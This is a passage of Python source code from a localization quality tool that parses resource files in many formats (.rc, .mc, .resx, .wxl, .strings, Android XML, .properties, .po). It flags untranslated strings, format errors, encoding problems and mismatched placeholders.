sorted_base_keys = sorted(base_keys)
base_key_value_pairs = base_res_file.key_value_pairs
for language, res_file in sorted(res_file_group.localized_res_files.items()):
target_keys = res_file.keys
target_key_value_pairs = res_file.key_value_pairs
for key in sorted_base_keys:
if key in target_keys:
target_value = target_key_value_pairs[key]
if (base_key_value_pairs[key] == target_value) and self.is_translation_necessary(target_value):
issue = Issue(file = res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.untranslated_value, description = Description.untranslated_value, severity = Severity.warning, context = Context.untranslated_value.value.format(key, target_value))
self.issues.add(issue)
def detect_values_with_format_error(self):
if IssueName.format_error.value not in self.detect_issues:
return
LOG.info("Detecting string value format issues in resource files...")
for res_file_group in self.res_file_groups:
for language, res_file in sorted(res_file_group.res_files.items()):
key_value_pairs = res_file.key_value_pairs
for escape_error_key in res_file.escape_error_keys:
issue = Issue(file = res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.format_error, description = Description.format_error, severity = Severity.error, context = Context.format_error.value.format(escape_error_key, key_value_pairs[escape_error_key]))
self.issues.add(issue)
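# Hook for subclasses: return the pyparsing pattern that recognizes placeholders in string values; returning None disables unmatched-placeholder detection.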
def get_placeholder_pattern(self):
return None
def detect_unmatched_placeholders(self):
if IssueName.unmatched_placeholder.value not in self.detect_issues:
return
LOG.info("Detecting unmatched placeholders in localized resource files...")
placeholder_pattern = self.get_placeholder_pattern()
if not placeholder_pattern:
LOG.info("Placeholder pattern is not defined, skip detection")
return
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
base_key_value_pairs = base_res_file.key_value_pairs
sorted_localized_res_files = sorted(res_file_group.localized_res_files.items())
for base_key, base_value in sorted(base_key_value_pairs.items()): # If this sorting consumes a lot of time, sort the detection results instead
base_placeholders = {}
#LOG.info("scanning string: {0}".format(base_value))
for tokens, start, end in placeholder_pattern.scanString(base_value):
placeholder = tokens[0]
#LOG.info(placeholder)
if placeholder in base_placeholders.keys():
base_placeholders[placeholder] += 1
else:
base_placeholders[placeholder] = 1
if not base_placeholders:
continue
for language, res_file in sorted_localized_res_files:
target_keys = res_file.keys
target_key_value_pairs = res_file.key_value_pairs
target_placeholders = {}
if base_key in target_keys:
target_value = target_key_value_pairs[base_key]
for tokens, start, end in placeholder_pattern.scanString(target_value):
placeholder = tokens[0]
if placeholder in target_placeholders.keys():
target_placeholders[placeholder] += 1
else:
target_placeholders[placeholder] = 1
if not base_placeholders == target_placeholders:
#LOG.info(",".join(base_placeholders.keys()) + "---" + ",".join(target_placeholders.keys()))
issue = Issue(file = res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.unmatched_placeholder, description = Description.unmatched_placeholder, severity = Severity.error, context = Context.unmatched_placeholder.value.format(base_key, base_value, target_value))
self.issues.add(issue)
def detect_unused_and_undefined_keys(self):
pass
def detect_encoding_errors(self):
if IssueName.encoding_error.value not in self.detect_issues:
return
LOG.info("Detecting resource file encoding errors...")
for res_file_group in self.res_file_groups:
for language, res_file in sorted(res_file_group.res_files.items()):
if res_file.encoding_error:
issue = Issue(file = res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.encoding_error, description = Description.encoding_error, severity = Severity.error, context = Context.encoding_error.value.format(res_file.encoding_error))
self.issues.add(issue)
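# RcResFile parses Win32 .rc resource scripts: key/value pairs are extracted from STRINGTABLE blocks, with #ifdef/#ifndef/#elif/#endif lines tolerated as a workaround for some code bases (see the patterns in RcResDetector below).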
class RcResFile(BaseResFile):
def parse(self, parsing_patterns):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
string_table, key_value_pair = parsing_patterns
for table_content_token, start_location, end_location in string_table.scanString(data):
for tokens, start, end in key_value_pair.scanString(table_content_token[0]):
for token in tokens:
key = token[0]
value = token[1]
pure_value = value[1:-1]
#compare values as well when deciding whether a key is duplicated; this is a workaround for Receiver for Windows, where many #ifdef statements repeat the same key
if key in self.keys and pure_value == self.key_value_pairs[key]:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(pure_value)
self.key_value_pairs[key] = pure_value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class RcResDetector(BaseResDetector):
def get_parsing_patterns(self):
key = PY.Word(PY.alphas + "_", PY.alphanums + "_") | PY.Word(PY.nums)
value = PY.dblQuotedString
define_patterns = PY.Regex(R"#ifdef.*") | PY.Regex(R"#ifndef.*") | PY.Regex(R"#elif.*") | PY.Regex(R"#endif.*") # add for Receiver for Windows
key_value_pair = (PY.Group(key + value) | define_patterns.suppress()).ignore(PY.cppStyleComment).parseWithTabs()
white_char = PY.Word(string.whitespace, exact = 1)
string_table = (white_char + PY.Literal("STRINGTABLE") + white_char).suppress() + PY.SkipTo((white_char + PY.Literal("BEGIN") + white_char) | PY.Literal("{"), ignore = PY.dblQuotedString | PY.cppStyleComment | define_patterns, include = True).suppress() + PY.originalTextFor(PY.SkipTo((white_char + PY.Literal("END") + (white_char | PY.stringEnd)) | PY.Literal("}"), ignore = PY.dblQuotedString | PY.cppStyleComment | define_patterns, include = True))
#string_table_sign = (white_char + PY.Literal("STRINGTABLE") + white_char).suppress() + PY.SkipTo(PY.Literal("{"), ignore = PY.dblQuotedString | PY.cppStyleComment | define_patterns, include = True).suppress() + PY.originalTextFor(PY.SkipTo(PY.Literal("}"), ignore = PY.dblQuotedString | PY.cppStyleComment | define_patterns, include = True))
string_table = string_table.ignore(PY.cppStyleComment).parseWithTabs().leaveWhitespace()
return string_table, key_value_pair
def get_placeholder_pattern(self):
#reference: http://msdn.microsoft.com/en-us/library/windows/desktop/ms679351%28v=vs.85%29.aspx, http://msdn.microsoft.com/en-us/library/56e442dc.aspx
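# Illustrative examples (not exhaustive): this pattern matches printf-style placeholders such as "%s" or "%08lX" as well as FormatMessage-style numbered placeholders such as "%1" or "%1!s!".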
positive_integer = PY.Word("123456789", PY.nums)
integer = PY.Literal("0") | positive_integer
flags = PY.Word("-+ #0")
width = integer | PY.Literal("*")
precision = PY.Literal(".") + width
type_prefix = PY.Literal("ll") | PY.Literal("l") | PY.Literal("I32") | PY.Literal("I64") | PY.Literal("I") | PY.Literal("h") | PY.Literal("w")
type_flag = PY.Word("cCdiouxXeEfgGaAnpsSZ", exact = 1)
format_string_body = PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + PY.Optional(type_prefix) + type_flag
special_characters = PY.Combine(PY.Literal("%") + PY.Word("0% .!nrt", exact = 1))
format_string = PY.Combine(PY.Literal("%") + format_string_body)
numbered_format_string = PY.Combine(PY.Literal("%") + positive_integer + PY.Optional(PY.Literal("!") + format_string_body + PY.Literal("!")))
placeholder_pattern = PY.originalTextFor(numbered_format_string | format_string | special_characters)
return placeholder_pattern
class Rc2ResFile(RcResFile):
pass
class Rc2ResDetector(RcResDetector):
pass
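# McResFile parses Windows Message Compiler (.mc) files: each MessageId block contributes its SymbolicName as the key and the message text (terminated by a line beginning with ".") as the value.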
class McResFile(BaseResFile):
#reference : http://msdn.microsoft.com/en-us/library/windows/desktop/dd996906(v=vs.85).aspx
def parse(self, parsing_patterns):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
key_value_pair = parsing_patterns
for tokens, start_location, end_location in key_value_pair.scanString(data):
key = tokens[0]
value = tokens[1]
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class McResDetector(BaseResDetector):
def get_parsing_patterns(self):
comment = PY.Regex(R";/(?:\*(?:[^*]*;\*+)+?/|/[^\n]*(?:\n[^\n]*)*?(?:(?<!\\)|\Z))")
#comment = PY.Regex(R";.*") #this kind of comments are used in some projects
variable = PY.Word(PY.alphanums + "_", PY.alphanums + "_")
message_key = PY.Literal("MessageId") + PY.Literal("=") + PY.Optional(PY.Optional(PY.Literal("+")) + variable)
severity = PY.Literal("Severity") + PY.Literal("=") + variable
facility = PY.Literal("Facility") + PY.Literal("=") + variable
symbolic_name = (PY.Literal("SymbolicName") + PY.Literal("=")).suppress() + variable
output_base = PY.Literal("OutputBase") + PY.Literal("=") + PY.Optional(PY.Literal("{")) + variable + PY.Optional(PY.Literal("}"))
language = PY.Literal("Language") + PY.Literal("=") + variable
message_value = PY.SkipTo(PY.lineStart + PY.Literal(".")).setParseAction(lambda s, l, t: t[0].strip())
#the pattern below is commented out because, in reality, the Severity/Facility/SymbolicName items can appear in any order, contrary to what MSDN says
#key_value_pair = message_key.suppress() + PY.Optional(severity).suppress() + PY.Optional(facility).suppress() + symbolic_name + PY.Optional(output_base).suppress() + PY.Optional(language).suppress() + message_value
careless_item = language | severity | facility | output_base
key_value_pair = message_key.suppress() + PY.ZeroOrMore(careless_item).suppress() + symbolic_name + PY.ZeroOrMore(careless_item).suppress() + message_value
return key_value_pair.ignore(comment).parseWithTabs()
def get_placeholder_pattern(self):
#reference : http://msdn.microsoft.com/en-us/library/windows/desktop/dd996906(v=vs.85).aspx and the links on the page
positive_integer = PY.Word("123456789", PY.nums)
integer = PY.Literal("0") | positive_integer
flags = PY.Word("-#0")
width = integer
precision = PY.Literal(".") + PY.Optional(integer)
type_flag = PY.Word("h", "cCdsSu", exact = 2) | PY.Word("l", "cCdisSuxX", exact = 2) | PY.Word("cCdipsSu", exact = 1)
format_string_body = PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + type_flag
special_characters = PY.Combine(PY.Literal("%") + PY.Word("0.!%nbr", exact = 1))
numbered_format_string = PY.Combine(PY.Literal("%") + positive_integer + PY.Optional(PY.Literal("!") + format_string_body + PY.Literal("!")))
placeholder_pattern = PY.originalTextFor(numbered_format_string | special_characters)
return placeholder_pattern
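# ResxResFile parses .NET .resx XML resources: <data name="..."> elements are read, and designer properties (names containing "." that do not end with ".Text") are filtered out.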
class ResxResFile(BaseResFile):
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
root = ET.fromstring(data)
#escape_pattern = None # TODO: record whether there is an escape error; not needed for now because a parse error is raised by the current implementation
for elem in root.findall("data"):
key = elem.get("name")
if key is None:
continue
#filter strings from all values parsed
if ("." in key) and (not key.endswith(".Text")):
continue
#if there is no child named "value" under "data", the actual value in C# project is null, we set it to "" in order to save effort to handle it
#if there is no text in "value" node, the actual value in C# project is ""
value = ""
sub_elem = elem.find("value")
if sub_elem is not None:
value = "".join(sub_elem.itertext())
if key in self.keys:
self.duplicate_keys.append(key)
#if escape_pattern.match(value):
# self.escape_error_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class ResxResDetector(BaseResDetector):
def is_translation_necessary(self, value):
return (BaseResDetector.is_translation_necessary(self, value) and (not "PublicKeyToken" in value))
def get_placeholder_pattern(self):
return PY.Literal("{").suppress() + PY.Word(PY.nums) + PY.Literal("}").suppress()
class ReswResFile(ResxResFile):
pass
class ReswResDetector(ResxResDetector):
pass
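# WxlResFile handles WiX localization (.wxl) files; the language is inferred from the file name (e.g. agee_zh-CN.wxl or Dmc-de-de.wxl) or from the parent directory name.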
class WxlResFile(BaseResFile):
# Perhaps the most efficient way to determine the language from the file name is to inspect the last five characters of the pure file name
def get_language(self):
sub_names = self.file.lower().split(".")
try:
sub_name = sub_names[-2]
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
except IndexError:
pass
for sub_name in sub_names:
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
#sometimes the file name is like agee_zh-CN.wxl
sub_names = self.file.lower().replace("." + self.extension, "").split("_")
try:
sub_name = sub_names[-1]
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
except IndexError:
pass
for sub_name in sub_names:
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
#sometimes the file name is like Dmc-de-de.wxl
try:
sub_name = self.file.lower()[-9:-4]
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
except Exception:
pass
sub_dirs = self.directory.lower().split(os.sep)
try:
sub_dir = sub_dirs[-1]
if sub_dir in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_dir]
except IndexError:
pass
#Is the following loop necessary? Do we need to check whether any sub-directory other than the last one is a language id?
for sub_dir in sub_dirs:
if sub_dir in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_dir]
return BASE_LANGUAGE
def get_group_id(self):
#Maybe the most efficient way to get the adjusted file name is self.file[0:-9]
sub_names = self.file.split(".")
file_adjusted = ""
for sub_name in sub_names:
if not sub_name.lower() in STANDARDIZED_LANGUAGES.keys():
file_adjusted += sub_name
#sometimes the file name is like agee_zh-CN.wxl
if "".join(sub_names) == file_adjusted:
file_adjusted = ""
sub_names = self.file.replace("." + self.extension, "").split("_")
for sub_name in sub_names:
if not sub_name.lower() in STANDARDIZED_LANGUAGES.keys():
file_adjusted += sub_name
file_adjusted = file_adjusted + "." + self.extension
#sometimes the file name is like Dmc-de-de.wxl
if ("_".join(sub_names) + "." + self.extension) == file_adjusted:
file_adjusted = self.file[0:-9]
sub_dirs = self.directory.split(os.sep)
dir_adjusted = sub_dirs
index = 0
for sub_dir in sub_dirs:
if sub_dir.lower() in STANDARDIZED_LANGUAGES.keys():
dir_adjusted.remove(sub_dir)
break
index += 1
return file_adjusted, os.sep.join(dir_adjusted), index
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
root = ET.fromstring(data)
#escape_pattern = None # TODO: record whether there is an escape error; not needed for now because a parse error is raised by the current implementation
for elem in root.iter():
if elem.tag.endswith("String"):
key = elem.get("Id")
if key is None:
continue
value = "".join(elem.itertext())
if key in self.keys:
self.duplicate_keys.append(key)
#if escape_pattern.match(value):
# self.escape_error_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class WxlResDetector(BaseResDetector):
def get_placeholder_pattern(self):
variable = PY.Word(PY.alphas + "_", PY.alphanums + "_")
number = PY.Literal("0") | PY.Word("123456789", PY.nums)
placeholder_pattern = PY.originalTextFor((PY.Literal("[") + (variable | number) + PY.Literal("]")) | (PY.Literal("{") + PY.Literal("\\") + variable + PY.Literal("}")))
return placeholder_pattern
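# StrResFile parses Apple .strings files ("key" = "value"; entries); the language is inferred from the name of the containing directory (for example an *.lproj-style folder name).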
class StrResFile(BaseResFile):
def get_language(self):
sub_names = os.path.basename(self.directory).lower().split(".")
if len(sub_names) > 1:
language = sub_names[-2]
if language in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[language]
else:
for language in sub_names:
if language in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[language]
return BASE_LANGUAGE
else:
return BASE_LANGUAGE
def get_group_id(self):
return self.file, os.path.dirname(self.directory)
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
variable = PY.Word(PY.alphas + "_", PY.alphanums + "_")
key_pattern = variable | PY.dblQuotedString
value_pattern = PY.dblQuotedString
key_value_pair = key_pattern + PY.Literal("=").suppress() + value_pattern + PY.Literal(";").suppress()
escape_pattern = re.compile(".*(?<!\\\)\".*")
for token, start_location, end_location in key_value_pair.ignore(PY.cppStyleComment).scanString(data):
key = token[0]
value = token[1]
pure_value = value[1:-1]
if key in self.keys:
self.duplicate_keys.append(key)
if escape_pattern.match(pure_value):
self.escape_error_keys.append(key)
self.keys.add(key)
self.values.append(pure_value)
self.key_value_pairs[key] = pure_value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class StrResDetector(BaseResDetector):
def get_placeholder_pattern(self):
#reference: http://pubs.opengroup.org/onlinepubs/009695399/functions/printf.html, https://developer.apple.com/library/mac/documentation/Cocoa/Conceptual/Strings/Articles/formatSpecifiers.html
#this pattern can only detect placeholders; it does not verify that they are legal
positive_integer = PY.Word("123456789", PY.nums)
index = positive_integer + PY.Literal("$")
flags = PY.Word("'-+ #0")
width = positive_integer | (PY.Literal("*") + PY.Optional(positive_integer + PY.Literal("$")))
precision = PY.Literal(".") + width
length_modifier = PY.Literal("hh") | PY.Literal("ll") | PY.Word("hljztqL", exact = 1)
conversion_specifier = PY.Word("@sdiouUxXfFeEgGaAcpnCS%", exact = 1)
placeholder_pattern = PY.originalTextFor(PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + PY.Optional(length_modifier) + conversion_specifier))
return placeholder_pattern
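# XibResFile does not parse .xib content: parse() records a single placeholder entry so the file still participates in file-level checks, and XibResDetector below disables all issue types by default.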
class XibResFile(StrResFile):
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
self.keys.add("KeyPlaceholder")
self.values.append("ValuePlaceholder")
self.key_value_pairs["KeyPlaceholder"] = "ValuePlaceholder"
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class XibResDetector(BaseResDetector):
def get_detect_issues(self):
if self.config.use_user_config:
LOG.info("Reading issue types to be detected from configuration file...")
self.detect_issues = getattr(self.config.config_module, self.config.detect_issues_attrs[self.res_file_type], [])
else:
LOG.info("Getting default issue types to be detected...")
self.detect_issues = []
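# XmlResFile handles Android resource XML: <string>, <string-array> (item keys suffixed with "#<index>") and <plurals> (item keys suffixed with "#<quantity>"); the language comes from the values-xx[-rYY] directory name.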
class XmlResFile(BaseResFile):
def get_language(self):
sub_names = os.path.basename(self.directory).lower().split("-")
count = len(sub_names)
if count == 1:
return BASE_LANGUAGE
elif count > 1:
for i in range(1, count):
language = sub_names[i]
if language in STANDARDIZED_LANGUAGES.keys():
result = STANDARDIZED_LANGUAGES[language]
if i + 1 < count and sub_names[i + 1].startswith("r"):
language = sub_names[i] + "-" + sub_names[i + 1]
if language in STANDARDIZED_LANGUAGES.keys():
result = STANDARDIZED_LANGUAGES[language]
return result
return BASE_LANGUAGE
else:
LOG.critical("A fatal error occurred when determining the language of file '{path}'".format(path = self.path))
quit_application(-1)
def get_group_id(self):
sub_names = os.path.basename(self.directory).lower().split("-")
base_name_adjusted = ""
count = len(sub_names)
region_flag = False
for i in range(count):
sub_name = sub_names[i]
if (not sub_name in STANDARDIZED_LANGUAGES.keys()) and (not region_flag):
base_name_adjusted += sub_name
elif not region_flag:
if i + 1 < count and sub_names[i + 1].startswith("r"):
language = sub_name + "-" + sub_names[i + 1]
if language in STANDARDIZED_LANGUAGES.keys():
region_flag = True
else:
region_flag = False
return self.file, base_name_adjusted, os.path.dirname(self.directory)
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
def get_value_info(value):
if value and len(value) > 1:
if value[0] == '"' and value[-1] == '"':
return value[1:-1], '"'
elif value[0] == "'" and value[-1] == "'":
return value[1:-1], "'"
else:
return value, None
else:
return value, None
root = ET.fromstring(data)
#apostrophe_pattern = re.compile(".*(?<!\\\)'.*")
#quote_pattern = re.compile(".*(?<!\\\)\".*")
for elem in root.iter():
if elem.tag == "string":
key = elem.get("name")
if key is None:
continue
value = "".join(elem.itertext())
pure_value, opener_closer = get_value_info(value)
if key in self.keys:
self.duplicate_keys.append(key)
#if (apostrophe_pattern.match(value) and (value[0] != "\"" or value[-1] != "\"")) or (quote_pattern.match(value) and (value[0] != "'" or value[-1] != "'")):
#self.escape_error_keys.append(key)
self.keys.add(key)
self.values.append(pure_value)
self.key_value_pairs[key] = pure_value
self.item_count += 1
elif elem.tag == "string-array":
key_prefix = elem.get("name")
if key_prefix is None:
continue
index = 0
for sub_elem in elem.findall("item"):
key = key_prefix + "#" + str(index)
index = index + 1
value = "".join(sub_elem.itertext())
pure_value, opener_closer = get_value_info(value)
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(pure_value)
self.key_value_pairs[key] = pure_value
self.item_count += 1
elif elem.tag == "plurals":
key_prefix = elem.get("name")
if key_prefix is None:
continue
for sub_elem in elem.findall("item"):
quantity = sub_elem.get("quantity")
if quantity is None:
continue
key = key_prefix + "#" + quantity
value = "".join(sub_elem.itertext())
pure_value, opener_closer = get_value_info(value)
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(pure_value)
self.key_value_pairs[key] = pure_value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class XmlResDetector(BaseResDetector):
def get_placeholder_pattern(self):
#reference : http://blog.csdn.net/weiyijijing/article/details/8082366
#need to verify against the official documentation in the future
positive_integer = PY.Word("123456789", PY.nums)
index = positive_integer + PY.Literal("$")
sign = PY.Word("+- 0,(#<")
string_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Literal("s"))
integer_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(sign) + PY.Optional(positive_integer) + PY.Word("doxX", exact = 1))
float_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(sign) + PY.Optional(positive_integer) + PY.Optional("." + positive_integer) + PY.Word("eEfgGaA", exact = 1))
character_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(PY.Literal("-")) + PY.Literal("c"))
percent_pattern = PY.Literal("%%")
newline_pattern = PY.Literal("%n")
time_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Literal("t") + PY.Word("cFDrTRHIklMSLNpzZsQBbhAaCYyjmde", exact = 1))
placeholder_pattern = PY.originalTextFor(string_pattern | percent_pattern | newline_pattern | integer_pattern | float_pattern | character_pattern | time_pattern)
return placeholder_pattern
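# ProResFile parses Java .properties files with a hand-written, line-oriented parser that honours escaped key terminators, backslash line continuations, and both natural and logical lines.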
class ProResFile(BaseResFile):
def get_language(self):
pure_name_end = 0 - len(".properties")
sub_names = self.file[0:pure_name_end].lower().split("_")
count = len(sub_names)
if count == 1:
if sub_names[0] in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_names[0]]
return BASE_LANGUAGE
elif count > 1:
language = sub_names[-2] + "-" + sub_names[-1]
if language in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[language]
else:
language = sub_names[-1]
if language in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[language]
else:
return BASE_LANGUAGE
else:
LOG.critical("A fatal error occurred when determining the language of file '{path}'".format(path = self.path))
quit_application(-1)
def get_group_id(self):
pure_name_end = 0 - len(".properties")
sub_names = self.file[0:pure_name_end].lower().split("_")
file_adjusted = ""
count = len(sub_names)
if count == 1:
if sub_names[0] not in STANDARDIZED_LANGUAGES.keys():
file_adjusted = sub_names[0]
elif count > 1:
language = sub_names[-2] + "-" + sub_names[-1]
if language in STANDARDIZED_LANGUAGES.keys():
file_adjusted = "_".join(sub_names[0:-2])
else:
language = sub_names[-1]
if language in STANDARDIZED_LANGUAGES.keys():
file_adjusted = "_".join(sub_names[0:-1])
else:
file_adjusted = "_".join(sub_names[0:])
else:
LOG.critical("A fatal error occurred when determining the language of file '{path}'".format(path = self.path))
quit_application(-1)
return file_adjusted, self.directory
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
normal_white_spaces = " \t\f"
white_spaces = " \t\f\r\n"
comment_starts = "#!"
key_terminators = ":=" + normal_white_spaces
class LineType(Enum):
comment = 0
blank = 1
natural = 2
logic = 3
def is_escape_character(line_string, index):
if index < 0:
return False
if line_string[index] != "\\":
return False
index -= 1
backslash_count = 1
while index >= 0 and line_string[index] == "\\":
index -= 1
backslash_count += 1
if backslash_count % 2:
return True
else:
return False
def get_line_information(line_string):
line_type = None
pure_len = len(line_string)
for char in line_string:
if char not in white_spaces:
if char in comment_starts:
line_type = LineType.comment
else:
if line_string.endswith("\r\n"):
if is_escape_character(line_string, pure_len - 3):
line_type = LineType.logic
pure_len -= 3
if line_string.lstrip(normal_white_spaces) == "\\\r\n":
line_type = LineType.blank
pure_len = 0
else:
line_type = LineType.natural
pure_len -= 2
elif line_string.endswith("\n") or line_string.endswith("\r"):
if is_escape_character(line_string, pure_len - 2):
line_type = LineType.logic
pure_len -= 2
tailing_line_string = line_string.lstrip(normal_white_spaces)
if tailing_line_string == "\\\n" or tailing_line_string == "\\\r":
line_type = LineType.blank
pure_len = 0
else:
line_type = LineType.natural
pure_len -= 1
else:
raise Exception("Unexpected line end detected")
break
else:
line_type = LineType.blank
pure_len = 0
return line_type, pure_len
def parse_start_from_key(line_string, pure_len):
key_start = 0
value_end = 0
value = ""
is_key_uncompleted = False
while key_start < pure_len:
if line_string[key_start] not in normal_white_spaces:
break
key_start += 1
else:
raise Exception("No non-whitespace character found, this should not happen")
key_end = key_start
while key_end < pure_len:
if (line_string[key_end] in key_terminators) and (not is_escape_character(line_string, key_end - 1)):
break
key_end += 1
else:
is_key_uncompleted = True
return line_string[key_start:key_end], value, is_key_uncompleted
value_start = key_end
symbol_not_found = True
while value_start < pure_len:
if line_string[value_start] in normal_white_spaces:
value_start += 1
elif symbol_not_found and line_string[value_start] in "=:":
symbol_not_found = False
value_start += 1
else:
break
if value_start == pure_len:
value_start = 0
value_end = 0
else:
value_end = pure_len
return line_string[key_start:key_end], line_string[value_start:value_end], is_key_uncompleted
def parse_start_from_value(line_string, pure_len):
value_start = 0
value_end = 0
while value_start < pure_len:
if line_string[value_start] in normal_white_spaces:
value_start += 1
else:
break
if value_start == pure_len:
raise Exception("No non-whitespace character found, this should not happen")
else:
value_end = pure_len
return line_string[value_start:value_end]
line_strings = data.splitlines(keepends = True)
if not (line_strings[-1].endswith("\n") or line_strings[-1].endswith("\r")):
line_strings[-1] += "\n"
line_count = len(line_strings)
line_index = 0
last_line_type = LineType.natural
is_key_uncompleted = True
key = ""
value = ""
while line_index < line_count:
line_string = line_strings[line_index]
line_type, pure_len = get_line_information(line_string)
if line_type == LineType.blank:
line_index += 1
elif line_type == LineType.comment:
line_index += 1
elif line_type == LineType.natural:
if last_line_type == LineType.natural:
key, value, is_key_uncompleted = parse_start_from_key(line_string, pure_len)
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
elif last_line_type == LineType.logic:
if is_key_uncompleted:
partial_key, value, is_key_uncompleted = parse_start_from_key(line_string, pure_len)
key += partial_key
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
else:
partial_value = parse_start_from_value(line_string, pure_len)
value += partial_value
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
else:
raise Exception("Unexpected line type")
last_line_type = LineType.natural
line_index += 1
elif line_type == LineType.logic:
if last_line_type == LineType.natural:
key, value, is_key_uncompleted = parse_start_from_key(line_string, pure_len)
elif last_line_type == LineType.logic:
if is_key_uncompleted:
partial_key, value, is_key_uncompleted = parse_start_from_key(line_string, pure_len)
key += partial_key
else:
partial_value = parse_start_from_value(line_string, pure_len)
value += partial_value
else:
raise Exception("Unexpected line type")
last_line_type = LineType.logic
line_index += 1
else:
raise Exception("Unexpected line type, this should not happen")
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class ProResDetector(BaseResDetector):
#[TODO]http://docs.oracle.com/javase/tutorial/i18n/format/messageFormat.html, http://docs.oracle.com/javase/8/docs/api/java/text/MessageFormat.html
def get_placeholder_pattern(self):
return PY.Literal("{").suppress() + PY.Word(PY.nums) + PY.Literal("}").suppress()
class PoResFile(BaseResFile):
#reference: http://pology.nedohodnik.net/doc/user/en_US/ch-poformat.html & http://www.gnu.org/software/gettext/manual/html_node/index.html
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
#TODO Support plurals
string_pattern = PY.OneOrMore(PY.dblQuotedString.copy()).setParseAction(lambda s, l, t: "".join([i[1:-1] for i in t]))
key_value_pair = PY.Optional(PY.Literal("msgctxt").suppress() + string_pattern) + PY.Literal("msgid").suppress() + string_pattern + PY.Literal("msgstr").suppress() + string_pattern
for tokens, start, end in key_value_pair.ignore(PY.pythonStyleComment).parseWithTabs().scanString(data):
if len(tokens) == 3:
key = tokens[0] + "#" + tokens[1]
value = tokens[2]
else:
key = tokens[0]
value = tokens[1]
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
except Exception as e:
